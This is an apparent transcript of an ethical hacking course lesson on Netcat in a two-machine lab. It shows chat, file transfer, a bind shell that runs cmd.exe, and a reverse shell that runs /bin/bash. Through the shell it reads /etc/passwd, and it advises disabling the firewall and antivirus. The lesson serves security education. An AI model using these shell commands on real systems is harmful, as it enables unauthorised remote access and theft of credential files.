Hello, my name is Anand. Again, I welcome you for this ethical hacking course. And in this module, I will be explaining about this Netcat. It does is it opens a port, and from the remote system, we can make use of this port and enter into the system. This is meant for purely an educational purpose. So let me quickly explain about what we are going to do with Netcat. Here I am using two systems. One is from Windows, whether I can use XP 7 or 8 or any other operating system, and the other is Kali Linux. Or you may even use two Windows systems also. Any configuration is okay. So Netcat can be downloaded with the help of URL which is mentioned here. And now what I generally do is like I'll quickly go to the Kali Linux, and also I'll open the Windows desktop shell. In this module, we'll also discuss about how to make a chat using NC, and then we'll also explore about how to transfer a file from two different operating systems using Netcat. And then we'll also execute remotely like using Netcat and also a reverse shell. So these are all the experiments which we are going to do in this particular Netcat. Okay, now let us quickly move ahead to Kali Linux. In this Kali Linux, yes, you can see this is my console. See the Kali Linux. This is 1.28 is my Kali Linux IP. And first of all, I'll get my remote desktop of Windows desktop. So on Windows, what you can do is you can enable remote. I'll make use as u hyphen u user star and hyphen p password is star again of 192.168.1.27 is my Windows IP. So here is my desktop. I have logged in. So now I have two systems here. You can see this is one and the other one is this is my Windows. Okay, so you can see this is 192.168.1.28 and this is 1.27. Now I have all my tools here on my desktop. So on my Windows, what I'm going to do is I'll launch this command prompt, and then I'll move ahead with desktop. I'll also go to Netcat, and you can see this one here also. You can see the tool which can be downloaded from the URL. This nc.exe is my main thing, and here is the write-up of what we are going to do. So the first step, I brought the desktop on Kali Linux. So now if I want to make a chat, so what I need to do is just open a port in in Windows, that is C colon. You can say CLS and say NC hyphen NLVP, L for listen, V for verbose, and P for port is 4444. I'm opening the port here. So once I open, it will be in listen mode. So on NC hyphen VB 192.168.1 dot, I can say this is of 27 using 4444. Okay. So now the socket is open. You can see here the socket is open, connection is open. Now you can say chat. You parallelly see what is happening here also. You can see hello, how are you? Yes, from here I am doing fine. I'm doing fine. Yeah, in this way you can have a chat window using Netcat. Now I can say Control C and terminate on both sides this chat. Now we will go ahead with the next one, which is called as file transfer. How I can transfer files. So here I'll say net NC, same thing, NLVP. You can open 4444 is the port which I'm using. Not only that, if you want, you can use any port, whichever free port which you have. Incoming.exe. So whatever data is coming from this Kali will go into this particular file incoming.exe. So here what I'm going to do, I will transfer a file called as w.exe. Say, where is this? This is the file. Okay, I want to transfer this file. Just copy this file. So now what I'm going to do is nc-nv. Okay, I'm going to transfer this file nv 192.168.1.27 with port number 4444. Okay, and use this file, this copy, and say paste. Okay, So this time same as it is, the file is now transferred here, transferred here. You can see this one. I'll say control C, and now when you say dir, you can see there is a file called as incoming.exe. Where is this incoming.exe? 308 KB, or you can say this is the file. You can try this, actually a wget file incoming, whether it is executable or not. Hyphen help should run. Yes, this run. In this way, you can transfer files between using Netcat. Now we will do one more thing. How to execute remote. Okay, so here again I'll do the same thing. nc hyphen listen with verbose port of 4444. So if anyone opens the socket, hyphen execute cmd.exe. So the port is now listened. Now here nc hyphen vv or verbose 192.168.1.27, port number is 4444. So what will happen here now, you see? So yeah, you can see the socket established. Directly you got a C prompt. So here, whoever logs in into this particular system, the CMD should be executed. The same socket is now established here. I hope you got it. Now if I want a reverse shell, so for executing this reverse shell, what we need to do is like on the C prompt nc hyphen lvp 4444. So here I am opening the port, and here what I am going to do is nc hyphen nv or vv or whatever it is 192.168.1.27, port number 4444. Okay, hyphen e bin bash. So here now what will happen on here, you can see here. Now if you say ls minus l, the command shall display, or who am I will display this root. Okay, cat etc password or password will display the password file. So very sensitive. So it is very dangerous if you keep any port open. So anyone can enter remotely if the port is opened and attack password files, etc, etc. See, the one more important thing which I want to tell you is that please, for this experiment purpose, please disable the firewall on the Windows. Okay, so that you can see, you can have this 4444 open properly. Okay, and also disable any say high security program, and also antivirus or maybe defenders, etc, whatever it is. This will help you in making the socket easily. Okay, thank you.